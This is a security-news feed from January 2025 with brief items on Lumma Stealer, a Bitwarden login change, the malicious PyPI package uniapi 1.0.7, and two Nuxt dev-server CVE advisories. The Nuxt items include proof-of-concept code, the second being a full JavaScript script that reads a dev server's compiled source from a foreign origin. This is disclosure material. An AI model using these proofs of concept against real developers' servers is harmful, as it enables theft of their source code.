Description: McAfee Labs has uncovered a network of malicious GitHub repositories masquerading as game hacks, cracked software, and cryptocurrency tools to distribute the Lumma Stealer malware. The cybercriminals behind these repositories frequently update them with new names and descriptions while maintaining the same malicious payload, ensuring continued infections despite GitHub’s takedown efforts. Pirate software to malware …
The post Fake Game Cheats on GitHub Deliver Lumma Stealer Malware appeared first on CyberInsider.
January 27th, 2025 (5 months ago)
|
Description: Starting in February 2025, Bitwarden will implement an additional security measure for accounts that do not have two-factor authentication (2FA) enabled. Users logging in from unrecognized devices will be required to verify their identity via an emailed code before accessing their vaults. This change aims to protect against unauthorized access and mitigate the risks of …
The post Bitwarden Adds Email Verification for Unrecognized Logins appeared first on CyberInsider.
January 27th, 2025 (5 months ago)
|
Description: We thank participants and look forward to sharing what we've learned
January 27th, 2025 (5 months ago)
|
Description: Whether you're facing growing data demands and increased cyber threats, or simply looking to future-proof your business, it's time to consider the long-term benefits of transitioning to a cloud-first infrastructure.
January 27th, 2025 (5 months ago)
|
Description: In this special interview episode of the 404 Media Podcast, Sam talks to Alexzandra Kekesi, VP of Brand and Community at Pornhub, about age verification laws and what she's hearing from adult performers.
January 27th, 2025 (5 months ago)
|
Description: Welcome to your weekly cybersecurity scoop! Ever thought about how the same AI meant to protect our hospitals could also compromise them? This week, we’re breaking down the sophisticated world of AI-driven threats, key updates in regulations, and some urgent vulnerabilities in healthcare tech that need our attention.
As we unpack these complex topics, we'll equip you with sharp insights to
January 27th, 2025 (5 months ago)
|
Description: uniapi version 1.0.7 introduces code that would execute on import of the module and download a script from a remote URL, and would then execute the downloaded script in a thread. The downloaded script would harvest system information and POST the information to another remote URL. This code was found in the PyPI release artifacts and was not present in the public GitHub repository.
References
https://github.com/pypa/advisory-database/tree/main/vulns/uniapi/PYSEC-2025-2.yaml
https://inspector.pypi.io/project/uniapi/1.0.7/packages/0f/40/c6e06c22bbc22ef45f40bf5a7711763fa08fec4d16b4718d86fd60970131/uniapi-1.0.7.tar.gz/uniapi-1.0.7/uniapi/__init__.py#line.11
https://github.com/advisories/GHSA-gvvw-rr8m-fj76
January 27th, 2025 (5 months ago)
|
CVE-2025-24360
Description: Summary
Nuxt allows any websites to send any requests to the development server and read the response due to default CORS settings.
Details
While Vite patched the default CORS settings to fix https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6, nuxt uses its own CORS handler by default (https://github.com/nuxt/nuxt/pull/23995).
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263
That CORS handler sets `Access-Control-Allow-Origin: *`.
Important: if you are on an affected version, it may be possible to opt out of the default Nuxt CORS handler by configuring `vite.server.cors`.
PoC
1. Start a dev server in any Nuxt project that uses Vite with `nuxt dev`.
2. From a page on a different origin, send a fetch request to http://localhost:3000/_nuxt/app.vue (`fetch('http://localhost:3000/_nuxt/app.vue')`).
Impact
Users of the Vite builder with the default `server.cors` option may have their source code stolen by malicious websites.
Additional Information
`/__nuxt_vite_node__/manifest` and `/__nuxt_vite_node__/module` also seem to have `Access-Control-Allow-Origin: *`, so it may also be possible to exploit that handler.
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39
Although I didn't find a valid module id.
Note that this handler is probably also vulnerable to DNS rebinding attacks, as I didn't find any host header checks.
References
https://github.com/nuxt/nuxt/security/advisories/GHS...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
CVE-2025-24361
Description: Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for a classic script made by a script tag is not subject to the same-origin policy, an attacker can inject `<script src="http://localhost:3000/_nuxt/app.js">` in their site and run the script.
By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.
PoC
1. Create a Nuxt project with the webpack / rspack builder.
2. Run `npm run dev`.
3. Open http://localhost:3000.
4. Run the script below in a web site that has a different origin.
5. You can see the source code output in the document and the devtools console.

```js
// Load the dev-server bundle as a classic script from a foreign origin.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
  // Each webpack chunk entry is [chunkIds, moduleMap]; index 1 is the module map.
  for (const page in window.webpackChunknuxt_app) {
    const moduleList = window.webpackChunknuxt_app[page][1]
    console.log(moduleList)
    for (const key in moduleList) {
      const p = document.createElement('p')
      const title = document.createElement('strong')
      title.textContent = key
      const code = document.createElement('code')
      // Function.prototype.toString exposes the compiled module source.
      code.textContent = moduleList[key].toString()
      p.append(title, ':', document.createElement('br'), code)
      document.body.appendChild(p)
    }
  }
})
document.head.appendChild(script)
```
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|